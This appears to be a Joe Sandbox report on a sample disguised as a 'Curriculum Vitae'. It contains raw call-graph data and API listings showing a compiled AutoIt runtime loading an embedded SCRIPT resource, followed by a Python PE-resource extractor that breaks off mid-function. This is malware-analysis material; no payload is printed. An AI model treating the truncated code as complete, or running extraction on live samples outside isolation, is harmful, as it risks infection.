d690ae 96859->96864 96860->96855 96866 d68fe3 ReadConsoleW 96860->96866 96910 d69424 28 API calls __fread_nolock 96861->96910 96908 d5f2d9 20 API calls _abort 96862->96908 96883 d68e45 __fread_nolock 96863->96883 96911 d5f2a3 20 API calls 2 library calls 96863->96911 96914 d5f2d9 20 API calls _abort 96864->96914 96878 d69083 96865->96878 96879 d6906c 96865->96879 96865->96883 96866->96865 96871 d68fff GetLastError 96866->96871 96867 d629c8 _free 20 API calls 96867->96830 96871->96863 96873 d68e80 96909 d5f2c6 20 API calls _abort 96873->96909 96874 d690b3 96915 d5f2c6 20 API calls _abort 96874->96915 96891 d6f89b 96875->96891 96880 d6909a 96878->96880 96878->96883 96912 d68a61 31 API calls 3 library calls 96879->96912 96913 d688a1 29 API calls __fread_nolock 96880->96913 96883->96867 96884 d6909f 96884->96883 96885->96801 96886->96803 96887->96808 96888->96801 96889->96817 96890->96819 96892 d6f8b5 96891->96892 96893 d6f8a8 96891->96893 96896 d6f8c1 96892->96896 96920 d5f2d9 20 API calls _abort 96892->96920 96919 d5f2d9 20 API calls _abort 96893->96919 96895 d6f8ad 96895->96850 96896->96850 96898 d6f8e2 96921 d627ec 26 API calls __wsopen_s 96898->96921 96900->96825 96901->96830 96902->96835 96903->96833 96904->96843 96905->96849 96906->96883 96907->96845 96908->96873 96909->96883 96910->96875 96911->96883 96912->96883 96913->96884 96914->96874 96915->96883 96916->96828 96917->96833 96918->96830 96919->96895 96920->96898 96921->96895 96925 d5e4e8 96922->96925 96924 da275d 96924->96675 96928 d5e469 96925->96928 96927 d5e505 96927->96924 96929 d5e48c 96928->96929 96930 d5e478 96928->96930 96935 d5e488 __alldvrm 96929->96935 96938 d6333f 11 API calls 2 library calls 96929->96938 96936 d5f2d9 20 API calls _abort 96930->96936 96933 d5e47d 96937 d627ec 26 API calls __wsopen_s 96933->96937 96935->96927 96936->96933 96937->96935 96938->96935 96940 d4fddb 22 API calls 96939->96940 96941 d32ff8 96940->96941 96941->96538 96943 d3b01b 96942->96943 96944 d7fb4d 96943->96944 96948 
d3b023 ISource 96943->96948 96945 d4fddb 22 API calls 96944->96945 96947 d7fb59 96945->96947 96946 d3b02a 96946->96540 96948->96946 96950 d3b090 22 API calls ISource 96948->96950 96950->96948 96953 da2e7a 96951->96953 96952 d350f5 40 API calls 96952->96953 96953->96952 96954 da28fe 27 API calls 96953->96954 96955 da2d3b 96953->96955 96956 d3511f 64 API calls 96953->96956 96954->96953 96955->96553 96955->96554 96956->96953 96958 da22e7 96957->96958 96959 da22d9 96957->96959 96961 da232c 96958->96961 96962 d5e5eb 29 API calls 96958->96962 96963 da22f0 96958->96963 96960 d5e5eb 29 API calls 96959->96960 96960->96958 96986 da2557 96961->96986 96964 da2311 96962->96964 96963->96553 96964->96961 96966 da231a 96964->96966 96966->96963 96970 d5e678 67 API calls 96966->96970 96967 da2370 96968 da2374 96967->96968 96969 da2395 96967->96969 96972 da2381 96968->96972 96974 d5e678 67 API calls 96968->96974 96990 da2171 96969->96990 96970->96963 96972->96963 96975 d5e678 67 API calls 96972->96975 96973 da239d 96976 da23c3 96973->96976 96977 da23a3 96973->96977 96974->96972 96975->96963 96997 da23f3 96976->96997 96979 da23b0 96977->96979 96980 d5e678 67 API calls 96977->96980 96979->96963 96981 d5e678 67 API calls 96979->96981 96980->96979 96981->96963 96982 da23de 96982->96963 96985 d5e678 67 API calls 96982->96985 96983 da23ca 96983->96982 97005 d5e678 96983->97005 96985->96963 96987 da257c 96986->96987 96989 da2565 __fread_nolock 96986->96989 96988 d5e8c4 __fread_nolock 40 API calls 96987->96988 96988->96989 96989->96967 96991 d5ea0c ___std_exception_copy 21 API calls 96990->96991 96992 da217f 96991->96992 96993 d5ea0c ___std_exception_copy 21 API calls 96992->96993 96994 da2190 96993->96994 96995 d5ea0c ___std_exception_copy 21 API calls 96994->96995 96996 da219c 96995->96996 96996->96973 96998 da2408 96997->96998 96999 da24c0 96998->96999 97001 da21cc 40 API calls 96998->97001 97004 da24c7 96998->97004 97018 da2606 96998->97018 97026 da2269 40 API calls 96998->97026 97022 
da2724 96999->97022 97001->96998 97004->96983 97006 d5e684 BuildCatchObjectHelperInternal 97005->97006 97007 d5e695 97006->97007 97008 d5e6aa 97006->97008 97100 d5f2d9 20 API calls _abort 97007->97100 97017 d5e6a5 __wsopen_s 97008->97017 97083 d5918d EnterCriticalSection 97008->97083 97010 d5e69a 97101 d627ec 26 API calls __wsopen_s 97010->97101 97013 d5e6c6 97084 d5e602 97013->97084 97015 d5e6d1 97102 d5e6ee LeaveCriticalSection __fread_nolock 97015->97102 97017->96982 97019 da2617 97018->97019 97020 da261d 97018->97020 97019->97020 97027 da26d7 97019->97027 97020->96998 97023 da2742 97022->97023 97024 da2731 97022->97024 97023->97004 97025 d5dbb3 65 API calls 97024->97025 97025->97023 97026->96998 97028 da2714 97027->97028 97029 da2703 97027->97029 97028->97019 97031 d5dbb3 97029->97031 97032 d5dbc1 97031->97032 97033 d5dbdd 97031->97033 97032->97033 97034 d5dbe3 97032->97034 97035 d5dbcd 97032->97035 97033->97028 97040 d5d9cc 97034->97040 97043 d5f2d9 20 API calls _abort 97035->97043 97038 d5dbd2 97044 d627ec 26 API calls __wsopen_s 97038->97044 97045 d5d97b 97040->97045 97043->97038 97044->97033 97046 d5d987 BuildCatchObjectHelperInternal 97045->97046 97053 d5918d EnterCriticalSection 97046->97053 97048 d5d995 97054 d5d9f4 97048->97054 97053->97048 97062 d649a1 97054->97062 97063 d5d955 __fread_nolock 26 API calls 97062->97063 97064 d649b0 97063->97064 97083->97013 97085 d5e624 97084->97085 97086 d5e60f 97084->97086 97098 d5e61f 97085->97098 97103 d5dc0b 97085->97103 97128 d5f2d9 20 API calls _abort 97086->97128 97089 d5e614 97129 d627ec 26 API calls __wsopen_s 97089->97129 97094 d5d955 __fread_nolock 26 API calls 97095 d5e646 97094->97095 97113 d6862f 97095->97113 97098->97015 97100->97010 97101->97017 97102->97017 97104 d5dc23 97103->97104 97108 d5dc1f 97103->97108 97105 d5d955 __fread_nolock 26 API calls 97104->97105 97104->97108 97106 d5dc43 97105->97106 97130 d659be 97106->97130 97109 d64d7a 97108->97109 97110 d5e640 97109->97110 97111 d64d90 97109->97111 
97110->97094 97111->97110 97112 d629c8 _free 20 API calls 97111->97112 97112->97110 97128->97089 97129->97098 97131 d659ca BuildCatchObjectHelperInternal 97130->97131 97132 d659d2 97131->97132 97133 d659ea 97131->97133 97307 d33156 97310 d33170 97307->97310 97311 d33187 97310->97311 97312 d331eb 97311->97312 97313 d3318c 97311->97313 97351 d331e9 97311->97351 97315 d331f1 97312->97315 97316 d72dfb 97312->97316 97317 d33265 PostQuitMessage 97313->97317 97318 d33199 97313->97318 97314 d331d0 DefWindowProcW 97344 d3316a 97314->97344 97319 d331f8 97315->97319 97320 d3321d SetTimer RegisterWindowMessageW 97315->97320 97366 d318e2 10 API calls 97316->97366 97317->97344 97322 d331a4 97318->97322 97323 d72e7c 97318->97323 97324 d33201 KillTimer 97319->97324 97325 d72d9c 97319->97325 97327 d33246 CreatePopupMenu 97320->97327 97320->97344 97328 d331ae 97322->97328 97329 d72e68 97322->97329 97380 d9bf30 34 API calls ___scrt_fastfail 97323->97380 97362 d330f2 Shell_NotifyIconW ___scrt_fastfail 97324->97362 97332 d72dd7 MoveWindow 97325->97332 97333 d72da1 97325->97333 97326 d72e1c 97367 d4e499 42 API calls 97326->97367 97327->97344 97337 d72e4d 97328->97337 97338 d331b9 97328->97338 97355 d9c161 97329->97355 97331 d72e8e 97331->97314 97331->97344 97332->97344 97341 d72da7 97333->97341 97342 d72dc6 SetFocus 97333->97342 97337->97314 97379 d90ad7 22 API calls 97337->97379 97339 d33253 97338->97339 97340 d331c4 97338->97340 97364 d3326f 44 API calls ___scrt_fastfail 97339->97364 97340->97314 97368 d330f2 Shell_NotifyIconW ___scrt_fastfail 97340->97368 97341->97340 97346 d72db0 97341->97346 97342->97344 97343 d33214 97363 d33c50 DeleteObject DestroyWindow 97343->97363 97365 d318e2 10 API calls 97346->97365 97349 d33263 97349->97344 97351->97314 97353 d72e41 97369 d33837 97353->97369 97356 d9c179 ___scrt_fastfail 97355->97356 97357 d9c276 97355->97357 97381 d33923 97356->97381 97357->97344 97359 d9c25f KillTimer SetTimer 97359->97357 97360 d9c1a0 97360->97359 97361 d9c251 
Shell_NotifyIconW 97360->97361 97361->97359 97362->97343 97363->97344 97364->97349 97365->97344 97366->97326 97367->97340 97368->97353 97370 d33862 ___scrt_fastfail 97369->97370 97452 d34212 97370->97452 97373 d338e8 97375 d73386 Shell_NotifyIconW 97373->97375 97376 d33906 Shell_NotifyIconW 97373->97376 97377 d33923 24 API calls 97376->97377 97378 d3391c 97377->97378 97378->97351 97379->97351 97380->97331 97382 d33a13 97381->97382 97383 d3393f 97381->97383 97382->97360 97403 d36270 97383->97403 97386 d73393 LoadStringW 97389 d733ad 97386->97389 97387 d3395a 97388 d36b57 22 API calls 97387->97388 97390 d3396f 97388->97390 97395 d3a8c7 22 API calls 97389->97395 97397 d33994 ___scrt_fastfail 97389->97397 97391 d733c9 97390->97391 97392 d3397c 97390->97392 97394 d36350 22 API calls 97391->97394 97392->97389 97393 d33986 97392->97393 97408 d36350 97393->97408 97398 d733d7 97394->97398 97395->97397 97400 d339f9 Shell_NotifyIconW 97397->97400 97398->97397 97417 d333c6 97398->97417 97400->97382 97401 d733f9 97402 d333c6 22 API calls 97401->97402 97402->97397 97404 d4fe0b 22 API calls 97403->97404 97405 d36295 97404->97405 97406 d4fddb 22 API calls 97405->97406 97407 d3394d 97406->97407 97407->97386 97407->97387 97409 d36362 97408->97409 97410 d74a51 97408->97410 97426 d36373 97409->97426 97436 d34a88 22 API calls __fread_nolock 97410->97436 97413 d74a5b 97415 d74a67 97413->97415 97416 d3a8c7 22 API calls 97413->97416 97414 d3636e 97414->97397 97416->97415 97418 d730bb 97417->97418 97419 d333dd 97417->97419 97421 d4fddb 22 API calls 97418->97421 97442 d333ee 97419->97442 97423 d730c5 _wcslen 97421->97423 97422 d333e8 97422->97401 97424 d4fe0b 22 API calls 97423->97424 97425 d730fe __fread_nolock 97424->97425 97427 d36382 97426->97427 97433 d363b6 __fread_nolock 97426->97433 97428 d74a82 97427->97428 97429 d363a9 97427->97429 97427->97433 97430 d4fddb 22 API calls 97428->97430 97437 d3a587 97429->97437 97432 d74a91 97430->97432 97434 d4fe0b 22 API calls 97432->97434 
97433->97414 97435 d74ac5 __fread_nolock 97434->97435 97436->97413 97438 d3a59d 97437->97438 97441 d3a598 __fread_nolock 97437->97441 97439 d7f80f 97438->97439 97440 d4fe0b 22 API calls 97438->97440 97440->97441 97441->97433 97443 d333fe _wcslen 97442->97443 97444 d33411 97443->97444 97445 d7311d 97443->97445 97446 d3a587 22 API calls 97444->97446 97447 d4fddb 22 API calls 97445->97447 97448 d3341e __fread_nolock 97446->97448 97449 d73127 97447->97449 97448->97422 97450 d4fe0b 22 API calls 97449->97450 97451 d73157 __fread_nolock 97450->97451 97453 d735a4 97452->97453 97454 d338b7 97452->97454 97453->97454 97455 d735ad DestroyIcon 97453->97455 97454->97373 97456 d9c874 42 API calls _strftime 97454->97456 97455->97454 97456->97373 97457 d3105b 97462 d3344d 97457->97462 97459 d3106a 97493 d500a3 29 API calls __onexit 97459->97493 97461 d31074 97463 d3345d __wsopen_s 97462->97463 97464 d3a961 22 API calls 97463->97464 97465 d33513 97464->97465 97466 d33a5a 24 API calls 97465->97466 97467 d3351c 97466->97467 97494 d33357 97467->97494 97470 d333c6 22 API calls 97471 d33535 97470->97471 97472 d3515f 22 API calls 97471->97472 97473 d33544 97472->97473 97474 d3a961 22 API calls 97473->97474 97475 d3354d 97474->97475 97476 d3a6c3 22 API calls 97475->97476 97477 d33556 RegOpenKeyExW 97476->97477 97478 d73176 RegQueryValueExW 97477->97478 97482 d33578 97477->97482 97479 d73193 97478->97479 97480 d7320c RegCloseKey 97478->97480 97481 d4fe0b 22 API calls 97479->97481 97480->97482 97490 d7321e _wcslen 97480->97490 97483 d731ac 97481->97483 97482->97459 97484 d35722 22 API calls 97483->97484 97485 d731b7 RegQueryValueExW 97484->97485 97487 d731d4 97485->97487 97489 d731ee ISource 97485->97489 97486 d34c6d 22 API calls 97486->97490 97488 d36b57 22 API calls 97487->97488 97488->97489 97489->97480 97490->97482 97490->97486 97491 d39cb3 22 API calls 97490->97491 97492 d3515f 22 API calls 97490->97492 97491->97490 97492->97490 97493->97461 97495 d71f50 __wsopen_s 97494->97495 97496 
d33364 GetFullPathNameW 97495->97496 97497 d33386 97496->97497 97498 d36b57 22 API calls 97497->97498 97499 d333a4 97498->97499 97499->97470 97500 3bb23b0 97514 3bb0000 97500->97514 97502 3bb2446 97517 3bb22a0 97502->97517 97520 3bb3470 GetPEB 97514->97520 97516 3bb068b 97516->97502 97518 3bb22a9 Sleep 97517->97518 97519 3bb22b7 97518->97519 97521 3bb349a 97520->97521 97521->97516 97522 d31098 97527 d342de 97522->97527 97526 d310a7 97528 d3a961 22 API calls 97527->97528 97529 d342f5 GetVersionExW 97528->97529 97530 d36b57 22 API calls 97529->97530 97531 d34342 97530->97531 97532 d393b2 22 API calls 97531->97532 97541 d34378 97531->97541 97533 d3436c 97532->97533 97535 d337a0 22 API calls 97533->97535 97534 d3441b GetCurrentProcess IsWow64Process 97536 d34437 97534->97536 97535->97541 97537 d73824 GetSystemInfo 97536->97537 97538 d3444f LoadLibraryA 97536->97538 97539 d34460 GetProcAddress 97538->97539 97540 d3449c GetSystemInfo 97538->97540 97539->97540 97543 d34470 GetNativeSystemInfo 97539->97543 97544 d34476 97540->97544 97541->97534 97542 d737df 97541->97542 97543->97544 97545 d3109d 97544->97545 97546 d3447a FreeLibrary 97544->97546 97547 d500a3 29 API calls __onexit 97545->97547 97546->97545 97547->97526 97548 d690fa 97549 d69107 97548->97549 97553 d6911f 97548->97553 97598 d5f2d9 20 API calls _abort 97549->97598 97551 d6910c 97599 d627ec 26 API calls __wsopen_s 97551->97599 97554 d6917a 97553->97554 97562 d69117 97553->97562 97600 d6fdc4 21 API calls 2 library calls 97553->97600 97556 d5d955 __fread_nolock 26 API calls 97554->97556 97557 d69192 97556->97557 97568 d68c32 97557->97568 97559 d69199 97560 d5d955 __fread_nolock 26 API calls 97559->97560 97559->97562 97561 d691c5 97560->97561 97561->97562 97563 d5d955 __fread_nolock 26 API calls 97561->97563 97564 d691d3 97563->97564 97564->97562 97565 d5d955 __fread_nolock 26 API calls 97564->97565 97566 d691e3 97565->97566 97567 d5d955 __fread_nolock 26 API calls 97566->97567 97567->97562 97569 d68c3e 
BuildCatchObjectHelperInternal 97568->97569 97570 d68c46 97569->97570 97571 d68c5e 97569->97571 97602 d5f2c6 20 API calls _abort 97570->97602 97572 d68d24 97571->97572 97576 d68c97 97571->97576 97609 d5f2c6 20 API calls _abort 97572->97609 97575 d68c4b 97603 d5f2d9 20 API calls _abort 97575->97603 97580 d68ca6 97576->97580 97581 d68cbb 97576->97581 97577 d68d29 97610 d5f2d9 20 API calls _abort 97577->97610 97579 d68c53 __wsopen_s 97579->97559 97604 d5f2c6 20 API calls _abort 97580->97604 97601 d65147 EnterCriticalSection 97581->97601 97585 d68cb3 97611 d627ec 26 API calls __wsopen_s 97585->97611 97586 d68cab 97605 d5f2d9 20 API calls _abort 97586->97605 97587 d68cc1 97589 d68cf2 97587->97589 97590 d68cdd 97587->97590 97592 d68d45 __fread_nolock 38 API calls 97589->97592 97606 d5f2d9 20 API calls _abort 97590->97606 97596 d68ced 97592->97596 97594 d68ce2 97607 d5f2c6 20 API calls _abort 97594->97607 97608 d68d1c LeaveCriticalSection __wsopen_s 97596->97608 97598->97551 97599->97562 97600->97554 97601->97587 97602->97575 97603->97579 97604->97586 97605->97585 97606->97594 97607->97596 97608->97579 97609->97577 97610->97585 97611->97579 97612 d3f7bf 97613 d3f7d3 97612->97613 97614 d3fcb6 97612->97614 97616 d3fcc2 97613->97616 97617 d4fddb 22 API calls 97613->97617 97615 d3aceb 23 API calls 97614->97615 97615->97616 97618 d3aceb 23 API calls 97616->97618 97619 d3f7e5 97617->97619 97621 d3fd3d 97618->97621 97619->97616 97620 d3f83e 97619->97620 97619->97621 97638 d3ed9d ISource 97620->97638 97647 d41310 97620->97647 97706 da1155 22 API calls 97621->97706 97624 d3fef7 97630 d3a8c7 22 API calls 97624->97630 97624->97638 97627 d84b0b 97708 da359c 82 API calls __wsopen_s 97627->97708 97628 d84600 97635 d3a8c7 22 API calls 97628->97635 97628->97638 97630->97638 97633 d50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97644 d3ec76 ISource 97633->97644 97634 d3a8c7 22 API calls 97634->97644 97635->97638 97636 d3fbe3 
97636->97638 97639 d84bdc 97636->97639 97645 d3f3ae ISource 97636->97645 97637 d3a961 22 API calls 97637->97644 97709 da359c 82 API calls __wsopen_s 97639->97709 97641 d84beb 97710 da359c 82 API calls __wsopen_s 97641->97710 97642 d500a3 29 API calls pre_c_initialization 97642->97644 97643 d4fddb 22 API calls 97643->97644 97644->97624 97644->97627 97644->97628 97644->97633 97644->97634 97644->97636 97644->97637 97644->97638 97644->97641 97644->97642 97644->97643 97644->97645 97646 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97644->97646 97704 d401e0 236 API calls 2 library calls 97644->97704 97705 d406a0 41 API calls ISource 97644->97705 97645->97638 97707 da359c 82 API calls __wsopen_s 97645->97707 97646->97644 97648 d41376 97647->97648 97649 d417b0 97647->97649 97650 d41390 97648->97650 97651 d86331 97648->97651 97826 d50242 5 API calls __Init_thread_wait 97649->97826 97711 d41940 97650->97711 97654 d8633d 97651->97654 97830 db709c 236 API calls 97651->97830 97654->97644 97656 d417ba 97658 d417fb 97656->97658 97660 d39cb3 22 API calls 97656->97660 97662 d86346 97658->97662 97664 d4182c 97658->97664 97659 d41940 9 API calls 97661 d413b6 97659->97661 97667 d417d4 97660->97667 97661->97658 97663 d413ec 97661->97663 97831 da359c 82 API calls __wsopen_s 97662->97831 97663->97662 97688 d41408 __fread_nolock 97663->97688 97666 d3aceb 23 API calls 97664->97666 97669 d41839 97666->97669 97827 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97667->97827 97668 d86369 97668->97644 97828 d4d217 236 API calls 97669->97828 97672 d8636e 97832 da359c 82 API calls __wsopen_s 97672->97832 97673 d4152f 97675 d4153c 97673->97675 97676 d863d1 97673->97676 97678 d41940 9 API calls 97675->97678 97834 db5745 54 API calls _wcslen 97676->97834 97679 d41549 97678->97679 97683 d864fa 97679->97683 97685 d41940 9 API calls 97679->97685 97680 d4fddb 22 API calls 97680->97688 97681 d41872 97829 d4faeb 23 API calls 97681->97829 
97682 d4fe0b 22 API calls 97682->97688 97683->97668 97835 da359c 82 API calls __wsopen_s 97683->97835 97690 d41563 97685->97690 97687 d3ec40 236 API calls 97687->97688 97688->97668 97688->97669 97688->97672 97688->97673 97688->97680 97688->97682 97688->97687 97689 d863b2 97688->97689 97833 da359c 82 API calls __wsopen_s 97689->97833 97690->97683 97692 d3a8c7 22 API calls 97690->97692 97694 d415c7 ISource 97690->97694 97692->97694 97693 d41940 9 API calls 97693->97694 97694->97668 97694->97681 97694->97683 97694->97693 97697 d4167b ISource 97694->97697 97721 db9abb 97694->97721 97727 d9d4ce 97694->97727 97730 db958b 97694->97730 97733 daf0ec 97694->97733 97742 db959f 97694->97742 97745 da6ef1 97694->97745 97695 d4171d 97695->97644 97697->97695 97825 d4ce17 22 API calls ISource 97697->97825 97704->97644 97705->97644 97706->97638 97707->97638 97708->97638 97709->97641 97710->97638 97712 d41981 97711->97712 97713 d4195d 97711->97713 97836 d50242 5 API calls __Init_thread_wait 97712->97836 97720 d413a0 97713->97720 97838 d50242 5 API calls __Init_thread_wait 97713->97838 97715 d4198b 97715->97713 97837 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97715->97837 97717 d48727 97717->97720 97839 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97717->97839 97720->97659 97840 d37510 97721->97840 97724 db9af4 97725 db9ae5 97724->97725 97863 d9417d 97724->97863 97725->97694 97873 d9dbbe lstrlenW 97727->97873 97878 db7f59 97730->97878 97732 db959b 97732->97694 97734 d37510 53 API calls 97733->97734 97735 daf126 97734->97735 97990 d39e90 97735->97990 97737 daf136 97738 daf15b 97737->97738 97739 d3ec40 236 API calls 97737->97739 97741 daf15f 97738->97741 98018 d39c6e 22 API calls 97738->98018 97739->97738 97741->97694 97743 db7f59 120 API calls 97742->97743 97744 db95af 97743->97744 97744->97694 97746 d3a961 22 API calls 97745->97746 97747 da6f1d 97746->97747 97748 d3a961 22 API calls 97747->97748 97749 da6f26 97748->97749 97750 da6f3a 

                      Control-flow Graph

                      [Rendered graph omitted; the executed/not-executed block colouring is not recoverable from the text. Blocks that call APIs, following the edges: 234 d342de-d3434d (calls d3a961, GetVersionExW, calls d36b57) → 254 d3441b-d34435 GetCurrentProcess, IsWow64Process → 270 d3444f-d3445e LoadLibraryA → 281 d34460-d3446e GetProcAddress → 288 d34470-d34474 GetNativeSystemInfo → 295 d3447a-d3447b FreeLibrary. The alternative edges out of 270 and 281 both lead to 282 d3449c-d344a6 GetSystemInfo, and a separate branch out of 260 reaches 269 d73824-d73828 GetSystemInfo; all paths rejoin at 289 d34476-d34478 / 294 d34481-d34493.]
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 00D3430D
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                      • GetCurrentProcess.KERNEL32(?,00DCCB64,00000000,?,?), ref: 00D34422
                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00D34429
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D34454
                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D34466
                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D34474
                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D3447B
                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00D344A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                      • API String ID: 3290436268-3101561225
                      • Opcode ID: 36e9009ea7e07989d582247ea3f98ea8927866f4c65311ba18cce6d8d2359640
                      • Instruction ID: 53945b67d79bf1741ff8b6678843a41626977139e01d551da6eb102a918a32fa
                      • Opcode Fuzzy Hash: 36e9009ea7e07989d582247ea3f98ea8927866f4c65311ba18cce6d8d2359640
                      • Instruction Fuzzy Hash: D7A1C66191A3C0DFC715C76B7C815997FE46B26300F0A94F9E085BBA22D27E558CDB31

                      Control-flow Graph

                      [Rendered graph omitted; the executed/not-executed colouring is not recoverable from the text. API-calling blocks along the main path: 1378 d342a2-d342ba CreateStreamOnHGlobal → 1380 d342bc-d342d3 FindResourceExW → 1382 d735ba-d735c9 LoadResource → 1383 d735cf-d735dd SizeofResource → 1384 d735e3-d735ee LockResource → 1385 d735f4-d735fc → 1386 d73600-d73612. Blocks 1380, 1382, 1383, 1384 and 1386 each also edge to the common exit 1381 d342d9 → 1379 d342da-d342dd; 1378 can go straight to 1379.]
                      APIs
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D350AA,?,?,00000000,00000000), ref: 00D342B2
                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D350AA,?,?,00000000,00000000), ref: 00D342C9
                      • LoadResource.KERNEL32(?,00000000,?,?,00D350AA,?,?,00000000,00000000,?,?,?,?,?,?,00D34F20), ref: 00D735BE
                      • SizeofResource.KERNEL32(?,00000000,?,?,00D350AA,?,?,00000000,00000000,?,?,?,?,?,?,00D34F20), ref: 00D735D3
                      • LockResource.KERNEL32(00D350AA,?,?,00D350AA,?,?,00000000,00000000,?,?,?,?,?,?,00D34F20,?), ref: 00D735E6
                      Strings
                      Memory Dump Source: as for the first function above (same .sdmp files and IDA snapshot)
                      Similarity
                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                      • String ID: SCRIPT
                      • API String ID: 3051347437-3967369404
                      • Opcode ID: 8ca7e480cf30bc672337078f3eb168acdccc2441968e0b4cd54e0417446a726b
                      • Instruction ID: 33e74c71e43a359d1e791be4600a6d8bb9d1b406b0612bf7b1797becc1709626
                      • Opcode Fuzzy Hash: 8ca7e480cf30bc672337078f3eb168acdccc2441968e0b4cd54e0417446a726b
                      • Instruction Fuzzy Hash: CE117C74202702BFD7218BA6DC48F27BBBDEBC6B51F188169F516DA650DB71EC008A34
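The listing above shows the runtime calling FindResourceExW with type 0x0A (RT_RCDATA) and the name "SCRIPT", then LoadResource, SizeofResource and LockResource: this is how a compiled AutoIt executable locates its embedded script (the "AutoIt v3" strings elsewhere in these listings belong to the same runtime). The Python below is an added example, not Joe Sandbox or AutoIt code. It walks a PE resource directory the same way (type, then name, then language) and returns the bytes LockResource would expose. Everything it runs against is constructed inline: the payload bytes stand in for the real script blob, which is not on this page, and `rsrc_section` reads headers without bounds checks, so harden it before pointing it at a hostile sample outside a lab.

```python
"""Walk a PE .rsrc directory the way FindResourceExW does and pull out an
RT_RCDATA resource by name.  Added example, not Joe Sandbox or AutoIt code.
The sample section and PE image are built inline; the payload is a stand-in."""
import struct

RT_RCDATA = 0x0A           # the type value passed to FindResourceExW in the listing above
HIGH_BIT = 0x80000000      # set on an entry field: points to a sub-directory / a name string


def _entries(rsrc, off):
    """Yield (key, target_off, is_subdir) for the IMAGE_RESOURCE_DIRECTORY at off;
    key is an int ID or the upper-cased UTF-16 name of a named entry."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, off + 12)
    for i in range(n_named + n_id):
        name, data = struct.unpack_from("<II", rsrc, off + 16 + 8 * i)
        if name & HIGH_BIT:                                  # IMAGE_RESOURCE_DIR_STRING_U
            s = name & 0x7FFFFFFF
            (n,) = struct.unpack_from("<H", rsrc, s)
            name = rsrc[s + 2:s + 2 + 2 * n].decode("utf-16-le").upper()
        yield name, data & 0x7FFFFFFF, bool(data & HIGH_BIT)


def find_resource(rsrc, res_type, res_name):
    """(data_rva, size) of the first language entry under type/name, else None.
    Names compare case-insensitively, as FindResource does."""
    want = res_name.upper() if isinstance(res_name, str) else res_name
    for key, off, sub in _entries(rsrc, 0):                  # level 1: type
        if sub and key == res_type:
            for key2, off2, sub2 in _entries(rsrc, off):     # level 2: name or ID
                if sub2 and key2 == want:
                    for _lang, off3, sub3 in _entries(rsrc, off2):   # level 3: language
                        if not sub3:                         # IMAGE_RESOURCE_DATA_ENTRY
                            return struct.unpack_from("<II", rsrc, off3)
    return None


def extract_resource(rsrc, rsrc_rva, res_type, res_name):
    """Bytes LockResource would expose for the entry, or None.  The data entry
    stores an RVA, so subtract the section RVA to index into the section bytes."""
    hit = find_resource(rsrc, res_type, res_name)
    if hit is None:
        return None
    data_rva, size = hit
    return bytes(rsrc[data_rva - rsrc_rva:data_rva - rsrc_rva + size])


def rsrc_section(pe):
    """(section_bytes, section_rva) of the section holding the resource directory
    of a whole PE image.  Header walk only; no hardening against hostile headers."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    (n_sect,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", pe, opt)
    (rva,) = struct.unpack_from("<I", pe, opt + (0x70 if magic == 0x10B else 0x80))  # data dir #2
    for i in range(n_sect):
        vsize, va, rsize, rptr = struct.unpack_from("<IIII", pe, opt + opt_size + 40 * i + 8)
        if va <= rva < va + max(vsize, rsize):
            return pe[rptr:rptr + rsize], va
    raise ValueError("resource directory RVA outside every section")


def build_rsrc(rsrc_rva, res_type, res_name, payload):
    """Constructed sample: root -> type dir -> name dir -> language dir -> data entry,
    laid out at fixed offsets 0x00, 0x18, 0x30, 0x48, with the name string at 0x58."""
    name_u16 = res_name.encode("utf-16-le")
    str_off, data_off = 0x58, (0x58 + 2 + len(name_u16) + 7) & ~7

    def directory(key, target):                    # one-entry IMAGE_RESOURCE_DIRECTORY
        named = isinstance(key, str)
        field = (HIGH_BIT | str_off) if named else key
        return struct.pack("<IIHHHH", 0, 0, 0, 0, named, not named) + struct.pack("<II", field, target)

    blob = directory(res_type, HIGH_BIT | 0x18) + directory(res_name, HIGH_BIT | 0x30)
    blob += directory(0, 0x48)                     # language 0 -> data entry (not a subdir)
    blob += struct.pack("<IIII", rsrc_rva + data_off, len(payload), 0, 0)
    blob += struct.pack("<H", len(res_name)) + name_u16
    return blob + b"\0" * (data_off - len(blob)) + payload


def build_min_pe(rsrc, rsrc_rva):
    """Constructed sample: smallest PE32 image carrying rsrc as its only section."""
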